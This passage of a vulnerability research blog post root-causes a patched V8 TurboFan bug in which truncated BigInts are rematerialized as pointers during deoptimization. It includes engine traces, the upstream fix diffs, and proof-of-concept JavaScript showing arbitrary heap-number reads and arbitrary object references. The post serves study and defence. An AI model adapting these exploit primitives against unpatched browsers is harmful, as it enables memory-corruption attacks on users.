4                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rcx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And we also see the code used to bail out to deoptimization (notice that the deopt index matches with the index of a translation in the deoptimization input data).

// trimmed / simplified output
nop
REX.W movq r13,0x0       ;; debug: deopt position, script offset '17'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason '(unknown)'
;; debug: deopt index 0
call 0x55807c02040       ;; lazy deoptimization bailout
// ...
REX.W movq r13,0x4       ;; debug: deopt position, script offset '44'
;; debug: deopt position, inlining id '-1'
;; debug: deopt reason 'wrong name'
;; debug: deopt index 4
call 0x55807bc2040       ;; eager deoptimization bailout
nop


Interestingly (you'll need to also add the --code-comments flag), we can notice that the beginning of an native turbofan compiled function starts with a check for any required lazy deoptimization!

                  -- Prologue: check for deoptimization --
0x1332e5442b44    24  488b59e0       REX.W movq rbx,[rcx-0x20]
0x1332e5442b48    28  f6430f01       testb [rbx+0xf],0x1
0x1332e5442b4c    2c  740d           jz 0x1332e5442b5b  <+0x3b>
-- Inlined Trampoline to CompileLazyDeoptimizedCode --
0x1332e5442b4e    2e  49ba6096371501000000 REX.W movq r10,0x115379660  (CompileLazyDeoptimizedCode)    ;; off heap target
0x1332e5442b58    38  41ffe2         jmp r10


Now let's trace the actual deoptimization with --trace-deopt. We can see the deoptimization reason : wrong name. Because the feedback indicates that we always add a property named "x", TurboFan then speculates it will always be the case. Thus, executing optimized code with any different name will violate this assumption and trigger a deoptimization.

[deoptimizing (DEOPT eager): begin 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> (opt #0) @2, FP to SP delta: 24, caller sp: 0x7ffeeb82e3b0]
;;; deoptimize at <test.js:3:8>, wrong name


It displays the input frame.

  reading input frame add_prop => bytecode_offset=6, args=2, height=1, retval=0(#0); inputs:
0: 0x0a6842edfa99 ;  [fp -  16]  0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)>
1: 0x0a6876381579 ;  [fp +  24]  0x0a6876381579 <JSGlobal Object>
2: 0x0a6842edf7a9 ; rdx 0x0a6842edf7a9 <String[#9]: different>
3: 0x0a6842ec1831 ;  [fp -  24]  0x0a6842ec1831 <NativeContext[244]>
4: captured object #0 (length = 7)
0x0a68d4640439 ; (literal  3) 0x0a68d4640439 <Map(HOLEY_ELEMENTS)>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a6893080c01 ; (literal  4) 0x0a6893080c01 <FixedArray[0]>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
0x0a68930804b1 ; (literal  5) 0x0a68930804b1 <undefined>
5: 0x002a00000000 ; (literal  6) 42


The deoptimizer uses the translation at index 2 of deoptimization data.

     2                6    NA  BEGIN {frame count=1, js frame count=1, update_feedback_count=0}
INTERPRETED_FRAME {bytecode_offset=6, function=0x3ee5e83df701 <String[#8]: add_prop>, height=1, [email protected](#0)}
STACK_SLOT {input=3}
STACK_SLOT {input=-2}
REGISTER {input=rdx}
STACK_SLOT {input=4}
CAPTURED_OBJECT {length=7}
LITERAL {literal_id=3 (0x3ee5301c0439 <Map(HOLEY_ELEMENTS)>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=4 (0x3ee5f5180c01 <FixedArray[0]>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=5 (0x3ee5f51804b1 <undefined>)}
LITERAL {literal_id=6 (42)}


And displays the translated interpreted frame.

  translating interpreted frame add_prop => bytecode_offset=6, variable_frame_size=16, frame_size=80
0x7ffeeb82e3a8: [top +  72] <- 0x0a6876381579 <JSGlobal Object> ;  stack parameter (input #1)
0x7ffeeb82e3a0: [top +  64] <- 0x0a6842edf7a9 <String[#9]: different> ;  stack parameter (input #2)
-------------------------
0x7ffeeb82e398: [top +  56] <- 0x000105d9e4d2 ;  caller's pc
0x7ffeeb82e390: [top +  48] <- 0x7ffeeb82e3f0 ;  caller's fp
0x7ffeeb82e388: [top +  40] <- 0x0a6842ec1831 <NativeContext[244]> ;  context (input #3)
0x7ffeeb82e380: [top +  32] <- 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> ;  function (input #0)
0x7ffeeb82e378: [top +  24] <- 0x0a6842edfbd1 <BytecodeArray[12]> ;  bytecode array
0x7ffeeb82e370: [top +  16] <- 0x003b00000000 <Smi 59> ;  bytecode offset
-------------------------
0x7ffeeb82e368: [top +   8] <- 0x0a6893080c11 <Odd Oddball: arguments_marker> ;  stack parameter (input #4)
0x7ffeeb82e360: [top +   0] <- 0x002a00000000 <Smi 42> ;  accumulator (input #5)


After that, it is ready to redirect the execution to the ignition interpreter.

[deoptimizing (eager): end 0x0a6842edfa99 <JSFunction add_prop (sfi = 0xa6842edf881)> @2 => node=6, pc=0x000105d9e9a0, caller sp=0x7ffeeb82e3b0, took 2.698 ms]
Materialization [0x7ffeeb82e368] <- 0x0a6842ee0031 ;  0x0a6842ee0031 <Object map = 0xa68d4640439>


Case study : an incorrect BigInt rematerialization

Back to simplified lowering

Let's have a look at the way FrameState nodes are dealt with during the simplified lowering phase.

FrameState nodes expect 6 inputs :

1. parameters
• UseInfo is AnyTagged
2. registers
• UseInfo is AnyTagged
3. the accumulator
• UseInfo is Any
4. a context
• UseInfo is AnyTagged
5. a closure
• UseInfo is AnyTagged
6. the outer frame state
• UseInfo is AnyTagged

A FrameState has a tagged output representation.

  void VisitFrameState(Node* node) {
DCHECK_EQ(5, node->op()->ValueInputCount());
DCHECK_EQ(1, OperatorProperties::GetFrameStateInputCount(node->op()));

ProcessInput(node, 0, UseInfo::AnyTagged());  // Parameters.
ProcessInput(node, 1, UseInfo::AnyTagged());  // Registers.

// Accumulator is a special flower - we need to remember its type in
// a singleton typed-state-values node (as if it was a singleton
// state-values node).
if (propagate()) {
EnqueueInput(node, 2, UseInfo::Any());
} else if (lower()) {
Zone* zone = jsgraph_->zone();
Node* accumulator = node->InputAt(2);
if (accumulator == jsgraph_->OptimizedOutConstant()) {
} else {
ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
accumulator));
}
}

ProcessInput(node, 3, UseInfo::AnyTagged());  // Context.
ProcessInput(node, 4, UseInfo::AnyTagged());  // Closure.
ProcessInput(node, 5, UseInfo::AnyTagged());  // Outer frame state.
return SetOutput(node, MachineRepresentation::kTagged);
}


An input node for which the use info is AnyTagged means this input is being used as a tagged value and that the truncation kind is any i.e. no truncation is required (although it may be required to distinguish between zeros).

An input node for which the use info is Any means the input is being used as any kind of value and that the truncation kind is any. No truncation is needed. The input representation is undetermined. That is the most generic case.

// The {UseInfo} class is used to describe a use of an input of a node.

static UseInfo AnyTagged() {
return UseInfo(MachineRepresentation::kTagged, Truncation::Any());
}
// Undetermined representation.
static UseInfo Any() {
return UseInfo(MachineRepresentation::kNone, Truncation::Any());
}
// Value not used.
static UseInfo None() {
return UseInfo(MachineRepresentation::kNone, Truncation::None());
}

const char* Truncation::description() const {
switch (kind()) {
// ...
case TruncationKind::kAny:
switch (identify_zeros()) {
case TruncationKind::kNone:
return "no-value-use";
// ...
case kIdentifyZeros:
return "no-truncation (but identify zeros)";
case kDistinguishZeros:
return "no-truncation (but distinguish zeros)";
}
}
// ...
}


If we trace the first phase of simplified lowering (truncation propagation), we'll get the following input :

 visit #46: FrameState (trunc: no-truncation (but distinguish zeros))
queue #7?: no-truncation (but distinguish zeros)
initial #45: no-truncation (but distinguish zeros)
queue #71?: no-truncation (but distinguish zeros)
queue #4?: no-truncation (but distinguish zeros)
queue #62?: no-truncation (but distinguish zeros)
queue #0?: no-truncation (but distinguish zeros)


All the inputs are added to the queue, no truncation is ever propagated. The node #71 corresponds to the accumulator since it is the 3rd input.

 visit #71: BigIntAsUintN (trunc: no-truncation (but distinguish zeros))
queue #70?: no-value-use


In our example, the accumulator input is a BigIntAsUintN node. Such a node consumes an input which is a word64 and is truncated to a word64.

The astute reader will wonder what happens if this node returns a number that requires more than 64 bits. The answer lies in the inlining phase. Indeed, a JSCall to the BigInt.AsUintN builtin will be reduced to a BigIntAsUintN turbofan operator only in the case where TurboFan is guaranted that the requested width is of 64-bit a most.

This node outputs a word64 and has BigInt as a restriction type. During the type propagation phase, any type computed for a given node will be intersected with its restriction type.

      case IrOpcode::kBigIntAsUintN: {
ProcessInput(node, 0, UseInfo::TruncatingWord64());
SetOutput(node, MachineRepresentation::kWord64, Type::BigInt());
return;
}


So at this point (after the propagation phase and before the lowering phase), if we focus on the FrameState node and its accumulator input node (3rd input), we can say the following :

• the FrameState's 2nd input expects MachineRepresentation::kNone (includes everything, especially kWord64)
• the FrameState doesn't truncate its 2nd input
• the BigIntAsUintN output representation is kWord64

Because the input 2 is used as Any (with a kNone representation), there won't ever be any conversion of the input node :

  // Converts input {index} of {node} according to given UseInfo {use},
// assuming the type of the input is {input_type}. If {input_type} is null,
// it takes the input from the input node {TypeOf(node->InputAt(index))}.
void ConvertInput(Node* node, int index, UseInfo use,
Type input_type = Type::Invalid()) {
Node* input = node->InputAt(index);
// In the change phase, insert a change before the use if necessary.
if (use.representation() == MachineRepresentation::kNone)
return;  // No input requirement on the use.


So what happens during during the last phase of simplified lowering (the phase that lowers nodes and adds conversions)? If we look at the visitor of FrameState nodes, we can see that eventually the accumulator input may get replaced by a TypedStateValues node. The BigIntAsUintN node is now the input of the TypedStateValues node. No conversion of any kind is ever done.

  ZoneVector<MachineType>* types =
new (zone->New(sizeof(ZoneVector<MachineType>)))
ZoneVector<MachineType>(1, zone);
(*types)[0] = DeoptMachineTypeOf(GetInfo(accumulator)->representation(),
TypeOf(accumulator));

node->ReplaceInput(
2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
accumulator));


Also, the vector of MachineType is associated to the TypedStateValues. To compute the machine type, DeoptMachineTypeOf relies on the node's type.

In that case (a BigIntAsUintN node), the type will be Type::BigInt().

Type OperationTyper::BigIntAsUintN(Type type) {
DCHECK(type.Is(Type::BigInt()));
return Type::BigInt();
}


As we just saw, because for this node the output representation is kWord64 and the type is BigInt, the MachineType is MachineType::AnyTagged.

  static MachineType DeoptMachineTypeOf(MachineRepresentation rep, Type type) {
// ..
if (rep == MachineRepresentation::kWord64) {
if (type.Is(Type::BigInt())) {
return MachineType::AnyTagged();
}
// ...
}


So if we look at the sea of node right after the escape analysis phase and before the simplified lowering phase, it looks like this :

And after the simplified lowering phase, we can confirm that a TypedStateValues node was indeed inserted.

After effect control linearization, the BigIntAsUintN node gets lowered to a Word64And node.

As we learned earlier, the FrameState and TypedStateValues nodes do not directly correspond to any code generation.

void InstructionSelector::VisitNode(Node* node) {
switch (node->opcode()) {
// ...
case IrOpcode::kFrameState:
case IrOpcode::kStateValues:
case IrOpcode::kObjectState:
return;
// ...


However, other nodes may make use of FrameState and TypedStateValues nodes. This is the case for instance of the various Deoptimize nodes and also Call nodes.

They will make the instruction selector build the necessary FrameStateDescriptor and StateValueList of StateValueDescriptor.

Using those structures, the code generator will then build the necessary DeoptimizationExits to which a Translation will be associated with. The function BuildTranslation will handle the the InstructionOperands in CodeGenerator::AddTranslationForOperand. And this is where the (AnyTagged) MachineType corresponding to the BigIntAsUintN node is used! When building the translation, we are using the BigInt value as if it was a pointer (second branch) and not a double value (first branch)!

void CodeGenerator::AddTranslationForOperand(Translation* translation,
Instruction* instr,
InstructionOperand* op,
MachineType type) {
case Constant::kInt64:
DCHECK_EQ(8, kSystemPointerSize);
if (type.representation() == MachineRepresentation::kWord64) {
literal =
DeoptimizationLiteral(static_cast<double>(constant.ToInt64()));
} else {
// When pointers are 8 bytes, we can use int64 constants to represent
// Smis.
DCHECK_EQ(MachineRepresentation::kTagged, type.representation());
DCHECK(smi.IsSmi());
literal = DeoptimizationLiteral(smi.value());
}
break;


This is very interesting because that means at runtime (when deoptimizing), the deoptimizer uses this pointer to rematerialize an object! But since this is a controlled value (the truncated big int), we can make the deoptimizer reference an arbitrary object and thus make the next ignition bytecode handler use (or not) this crafted reference.

In this case, we are playing with the accumulator register. Therefore, to find interesting primitives, what we need to do is to look for all the bytecode handlers that get the accumulator (using a GetAccumulator for instance).

Experiment 1 - reading an arbitrary heap number

The most obvious primitive is the one we get by deoptimizing to the ignition handler for add opcodes.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var res = 1.1 + y; // will trigger a deoptimization. reason : "Insufficient type feedback for binary operation"
return res;
}
catch(_){ return y}
}

function compileOnce() {
f({x:1.1});
%PrepareFunctionForOptimization(f);
f({x:1.1});
%OptimizeFunctionOnNextCall(f);
return f({x:1.1});
}


When reading the implementation of the handler (BinaryOpAssembler::Generate_AddWithFeedback in src/ic/bin-op-assembler.cc), we observe that for heap numbers additions, the code ends up calling the function LoadHeapNumberValue. In that case, it gets called with an arbitrary pointer.

To demonstrate the bug, we use the %DebugPrint runtime function to get the address of an object (simulate an infoleak primitive) and see that we indeed (incorrectly) read its value.

d8> var a = new Number(3.14); %DebugPrint(a)
0x025f585caa49 <Number map = 000000FB210820A1 value = 0x019d1cb1f631 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
4.24


We can get the same primitive using other kind of ignition bytecode handlers such as +, -,/,* or %.

--- var res = 1.1 + y;
+++ var res = y / 1;

d8> var a = new Number(3.14); %DebugPrint(a)
0x019ca5a8aa11 <Number map = 00000138F15420A1 value = 0x0168e8ddf611 <HeapNumber 3.14>>
3.14
undefined
d8> compileOnce()
3.14


The --trace-ignition debugging utility can be interesting in this scenario. For instance, let's say we use a BigInt value of 0x4200000000 and instead of doing 1.1 + y we do y / 1. Then we want to trace it and confirm the behaviour that we expect.

The trace tells us :

• a deoptimization was triggered and why (insufficient type feedback for binary operation, this binary operation being the division)
• in the input frame, there is a register entry containing the bigint value thanks to (or because of) the incorrect lowering 11: 0x004200000000 ; rcx 66
• in the translated interpreted frame the accumulator gets the value 0x004200000000 (<Smi 66>)
• we deoptimize directly to the offset 39 which corresponds to DivSmi [1], [6]
[deoptimizing (DEOPT soft): begin 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> (opt #0) @3, FP to SP delta: 40, caller sp: 0x0042f87fde08]
;;; deoptimize at <read_heap_number.js:11:17>, Insufficient type feedback for binary operation
reading input frame f => bytecode_offset=39, args=2, height=8, retval=0(#0); inputs:
0: 0x01b141c5f5f1 ;  [fp -  16]  0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)>
1: 0x03a35e2c1349 ;  [fp +  24]  0x03a35e2c1349 <JSGlobal Object>
2: 0x03a35e2cb3b1 ;  [fp +  16]  0x03a35e2cb3b1 <Object map = 0000019FAF409DF1>
3: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
4: 0x03a35e2cb3d1 ; rdi 0x03a35e2cb3d1 <BigInt 283467841536>
5: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
6: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
7: 0x01b141c5f551 ;  [fp -  24]  0x01b141c5f551 <ScriptContext[5]>
8: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
9: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
10: 0x00422b840df1 ; (literal  2) 0x00422b840df1 <Odd Oddball: optimized_out>
11: 0x004200000000 ; rcx 66
translating interpreted frame f => bytecode_offset=39, height=64
0x0042f87fde00: [top + 120] <- 0x03a35e2c1349 <JSGlobal Object> ;  stack parameter (input #1)
0x0042f87fddf8: [top + 112] <- 0x03a35e2cb3b1 <Object map = 0000019FAF409DF1> ;  stack parameter (input #2)
-------------------------
0x0042f87fddf0: [top + 104] <- 0x7ffd93f64c1d ;  caller's pc
0x0042f87fdde8: [top +  96] <- 0x0042f87fde38 ;  caller's fp
0x0042f87fdde0: [top +  88] <- 0x01b141c5f551 <ScriptContext[5]> ;  context (input #3)
0x0042f87fddd8: [top +  80] <- 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> ;  function (input #0)
0x0042f87fddd0: [top +  72] <- 0x01b141c5fa41 <BytecodeArray[61]> ;  bytecode array
0x0042f87fddc8: [top +  64] <- 0x005c00000000 <Smi 92> ;  bytecode offset
-------------------------
0x0042f87fddc0: [top +  56] <- 0x03a35e2cb3d1 <BigInt 283467841536> ;  stack parameter (input #4)
0x0042f87fddb8: [top +  48] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #5)
0x0042f87fddb0: [top +  40] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #6)
0x0042f87fdda8: [top +  32] <- 0x01b141c5f551 <ScriptContext[5]> ;  stack parameter (input #7)
0x0042f87fdda0: [top +  24] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #8)
0x0042f87fdd98: [top +  16] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #9)
0x0042f87fdd90: [top +   8] <- 0x00422b840df1 <Odd Oddball: optimized_out> ;  stack parameter (input #10)
0x0042f87fdd88: [top +   0] <- 0x004200000000 <Smi 66> ;  accumulator (input #11)
[deoptimizing (soft): end 0x01b141c5f5f1 <JSFunction f (sfi = 000001B141C5F299)> @3 => node=39, pc=0x7ffd93f65100, caller sp=0x0042f87fde08, took 2.328 ms]
-> 000001B141C5FA9D @   39 : 43 01 06          DivSmi [1], [6]
[ accumulator -> 66 ]
[ accumulator <- 66 ]
-> 000001B141C5FAA0 @   42 : 26 f9             Star r2
[ accumulator -> 66 ]
[          r2 <- 66 ]
-> 000001B141C5FAA2 @   44 : a9                Return
[ accumulator -> 66 ]


Experiment 2 - getting an arbitrary object reference

This bug also gives a better, more powerful, primitive. Indeed, if instead of deoptimizing back to an add handler, we deoptimize to Builtins_StaKeyedPropertyHandler, we'll be able to store an arbitrary object reference in an object property. Therefore, if an attacker is also able to leverage an infoleak primitive, he would be able to craft any arbitrary object (these are sometimes referred to as addressof and fakeobj primitives) .

In order to deoptimize to this specific handler, aka deoptimize on obj[x] = y, we have to make this line do something that violates a speculation. If we repeatedly call the function f with the same property name, TurboFan will speculate that we're always gonna add the same property. Once the code is optimized, using a property with a different name will violate this assumption, call the deoptimizer and then redirect execution to the StaKeyedProperty handler.

let addr = BigInt(0x11111111);

}

function f(x) {
let a = 111;
try {
var obj = {};
obj[x] = y;
return obj;
}
catch(_){ return y}
}

function compileOnce() {
f("foo");
%PrepareFunctionForOptimization(f);
f("foo");
f("foo");
f("foo");
f("foo");
%OptimizeFunctionOnNextCall(f);
f("foo");
return f("boom"); // deopt reason : wrong name
}


To experiment, we simply simulate the infoleak primitive by simply using a runtime function %DebugPrint and adding an ArrayBuffer to the object. That should not be possible since the javascript code is actually adding a truncated BigInt.

d8> var a = new ArrayBuffer(8); %DebugPrint(a);
0x003d5ef8ab79 <ArrayBuffer map = 00000354B09C2191>
[object ArrayBuffer]
undefined
undefined
0x003d5ef8d159 <Object map = 00000354B09C9F81>
{boom: [object ArrayBuffer]}
[object ArrayBuffer]


Et voila! Sweet as!

Variants

We saw with the first commit that the pattern affected FrameState nodes but also StateValues nodes.

Another commit further fixed the exact same bug affecting ObjectState nodes.

From 3ce6be027562ff6641977d7c9caa530c74a279ac Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Tue, 26 Nov 2019 13:17:45 +0100
Subject: [PATCH] [turbofan] Fixes crash caused by truncated bigint

Bug: chromium:1028191
Change-Id: Idfcd678b3826fb6238d10f1e4195b02be35c3010
Commit-Queue: Nico Hartmann <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 4c000af..f271469 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1254,7 +1254,13 @@
void VisitObjectState(Node* node) {
if (propagate()) {
for (int i = 0; i < node->InputCount(); i++) {
-        EnqueueInput(node, i, UseInfo::Any());
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          EnqueueInput(node, i, UseInfo::AnyTagged());
+        } else {
+          EnqueueInput(node, i, UseInfo::Any());
+        }
}
} else if (lower()) {
Zone* zone = jsgraph_->zone();
@@ -1265,6 +1271,11 @@
Node* input = node->InputAt(i);
(*types)[i] =
DeoptMachineTypeOf(GetInfo(input)->representation(), TypeOf(input));
+        // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+        // truncated BigInts.
+        if (TypeOf(node->InputAt(i)).Is(Type::BigInt())) {
+          ConvertInput(node, i, UseInfo::AnyTagged());
+        }
}
NodeProperties::ChangeOp(node, jsgraph_->common()->TypedObjectState(
ObjectIdOf(node->op()), types));
diff --git a/test/mjsunit/regress/regress-1028191.js b/test/mjsunit/regress/regress-1028191.js
new file mode 100644
index 0000000..543028a
--- /dev/null
+++ b/test/mjsunit/regress/regress-1028191.js
@@ -0,0 +1,23 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+"use strict";
+
+function f(a, b, c) {
+  let x = BigInt.asUintN(64, a + b);
+  try {
+    x + c;
+  } catch(_) {
+    eval();
+  }
+  return x;
+}
+
+%PrepareFunctionForOptimization(f);
+assertEquals(f(3n, 5n), 8n);
+assertEquals(f(8n, 12n), 20n);
+%OptimizeFunctionOnNextCall(f);
+assertEquals(f(2n, 3n), 5n);


Interestingly, other bugs in the representation changers got triggered by very similars PoCs. The fix simply adds a call to InsertConversion so as to insert a ChangeUint64ToBigInt node when necessary.

From 8aa588976a1c4e593f0074332f5b1f7020656350 Mon Sep 17 00:00:00 2001
From: Nico Hartmann <[email protected]>
Date: Thu, 12 Dec 2019 10:06:19 +0100
Subject: [PATCH] [turbofan] Fixes rematerialization of truncated BigInts

Bug: chromium:1029530
Change-Id: I12aa4c238387f6a47bf149fd1a136ea83c385f4b
Auto-Submit: Nico Hartmann <[email protected]>
Commit-Queue: Georg Neis <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
---

diff --git a/src/compiler/representation-change.cc b/src/compiler/representation-change.cc
index 99b3d64..9478e15 100644
--- a/src/compiler/representation-change.cc
+++ b/src/compiler/representation-change.cc
@@ -175,6 +175,15 @@
}
}

+  // Rematerialize any truncated BigInt if user is not expecting a BigInt.
+  if (output_type.Is(Type::BigInt()) &&
+      output_rep == MachineRepresentation::kWord64 &&
+      use_info.type_check() != TypeCheckKind::kBigInt) {
+    node =
+        InsertConversion(node, simplified()->ChangeUint64ToBigInt(), use_node);
+    output_rep = MachineRepresentation::kTaggedPointer;
+  }
+
switch (use_info.representation()) {
case MachineRepresentation::kTaggedSigned:
DCHECK(use_info.type_check() == TypeCheckKind::kNone ||
diff --git a/test/mjsunit/regress/regress-1029530.js b/test/mjsunit/regress/regress-1029530.js
new file mode 100644
index 0000000..918a9ec
--- /dev/null
+++ b/test/mjsunit/regress/regress-1029530.js
@@ -0,0 +1,40 @@
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax --interrupt-budget=1024
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,3n);
+    let i = 0;
+    while(i < 1) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}
+
+
+{
+  function f() {
+    const b = BigInt.asUintN(4,10n);
+    let i = 0.1;
+    while(i < 1.8) {
+      i + 1;
+      i = b;
+    }
+  }
+
+  %PrepareFunctionForOptimization(f);
+  f();
+  f();
+  %OptimizeFunctionOnNextCall(f);
+  f();
+}


An inlining bug was also patched. Indeed, a call to BigInt.asUintN would get inlined even when no value argument is given (as in BigInt.asUintN(bits,no_value_argument_here)). Therefore a call to GetValueInput would be made on a non-existing input! The fix simply adds a check on the number of inputs.

Node* value = NodeProperties::GetValueInput(node, 3); // input 3 may not exist!


An interesting fact to point out is that none of those PoCs would actually correctly execute. They would trigger exceptions that need to get caught. This leads to interesting behaviours from TurboFan that optimizes 'invalid' code.

Digression on pointer compression

In our small experiments, we used standard tagged pointers. To distinguish small integers (Smis) from heap objects, V8 uses the lowest bit of an object address.

Up until V8 8.0, it looks like this :

Smi:                   [32 bits] [31 bits (unused)]  |  0
Strong HeapObject:                        [pointer]  | 01
Weak HeapObject:                          [pointer]  | 11


However, with V8 8.0 comes pointer compression. It is going to be shipped with the upcoming M80 stable release. Starting from this version, Smis and compressed pointers are stored as 32-bit values :

Smi:                                      [31 bits]  |  0
Strong HeapObject:                        [30 bits]  | 01
Weak HeapObject:                          [30 bits]  | 11


As described in the design document, a compressed pointer corresponds to the first 32-bits of a pointer to which we add a base address when decompressing.

Let's quickly have a look by inspecting the memory ourselves. Note that DebugPrint displays uncompressed pointers.

d8> var a = new Array(1,2,3,4)
undefined
d8> %DebugPrint(a)
DebugPrint: 0x16a4080c5f61: [JSArray]
- map: 0x16a4082817e9 <Map(PACKED_SMI_ELEMENTS)> [FastProperties]
- prototype: 0x16a408248f25 <JSArray[0]>
- elements: 0x16a4080c5f71 <FixedArray[4]> [PACKED_SMI_ELEMENTS]
- length: 4
- properties: 0x16a4080406e1 <FixedArray[0]> {
#length: 0x16a4081c015d <AccessorInfo> (const accessor descriptor)
}
- elements: 0x16a4080c5f71 <FixedArray[4]> {
0: 1
1: 2
2: 3
3: 4
}


If we look in memory, we'll actually find compressed pointers, which are 32-bit values.

(lldb) x/10wx 0x16a4080c5f61-1
0x16a4080c5f60: 0x082817e9 0x080406e1 0x080c5f71 0x00000008
0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004
0x16a4080c5f80: 0x00000006 0x00000008


To get the full address, we need to know the base.

(lldb) register read r13
r13 = 0x000016a400000000


And we can manually uncompress a pointer by doing base+compressed_pointer (and obviously we substract 1 to untag the pointer).

(lldb) x/10wx r13+0x080c5f71-1 0x16a4080c5f70: 0x080404a9 0x00000008 0x00000002 0x00000004 0x16a4080c5f80: 0x00000006 0x00000008 0x08040549 0x39dc599e 0x16a4080c5f90: 0x00000adc 0x7566280a  Because now on a 64-bit build Smis are on 32-bits with the lsb set to 0, we need to shift their values by one. Also, raw pointers are supported. An example of raw pointer is the backing store pointer of an array buffer. d8> var a = new ArrayBuffer(0x40); d8> var v = new Uint32Array(a); d8> v[0] = 0x41414141  d8> %DebugPrint(a) DebugPrint: 0x16a4080c7899: [JSArrayBuffer] - map: 0x16a408281181 <Map(HOLEY_ELEMENTS)> [FastProperties] - prototype: 0x16a4082476f5 <Object map = 0x16a4082811a9> - elements: 0x16a4080406e1 <FixedArray[0]> [HOLEY_ELEMENTS] - embedder fields: 2 - backing_store: 0x107314fd0 - byte_length: 64 - detachable - properties: 0x16a4080406e1 <FixedArray[0]> {} - embedder fields = { 0, aligned pointer: 0x0 0, aligned pointer: 0x0 }  (lldb) x/10wx 0x16a4080c7899-1 0x16a4080c7898: 0x08281181 0x080406e1 0x080406e1 0x00000040 0x16a4080c78a8: 0x00000000 0x07314fd0 0x00000001 0x00000002 0x16a4080c78b8: 0x00000000 0x00000000  We indeed find the full raw pointer in memory (raw | 00). (lldb) x/2wx 0x0000000107314fd0 0x107314fd0: 0x41414141 0x00000000  Conclusion We went through various components of V8 in this article such as Ignition, TurboFan's simplified lowering phase as well as how deoptimization works. Understanding this is interesting because it allows us to grasp the actual underlying root cause of the bug we studied. At first, the base trigger looks very simple but it actually involves quite a few interesting mechanisms. However, even though this bug gives a very interesting primitive, unfortunately it does not provide any good infoleak primitive. Therefore, it would need to be combined with another bug (obviously, we don't want to use any kind of heap spraying). Special thanks to my mates Axel Souchet, Dougall J, Bill K, yrp604 and Mark Dowd for reviewing this article and kudos to the V8 team for building such an amazing JavaScript engine! Please feel free to contact me on twitter if you've got any feedback or question! Also, my team at Trenchant aka Azimuth Security is hiring so don't hesitate to reach out if you're interested :) (DMs are open, otherwise jf at company dot com with company being azimuthsecurity) References Technical documents Bugs A journey into IonMonkey: root-causing CVE-2019-9810. 17 June 2019 at 15:00 A journey into IonMonkey: root-causing CVE-2019-9810. Introduction In May, I wanted to play with BigInt and evaluate how I could use them for browser exploitation. The exploit I wrote for the blazefox relied on a Javascript library developed by @5aelo that allows code 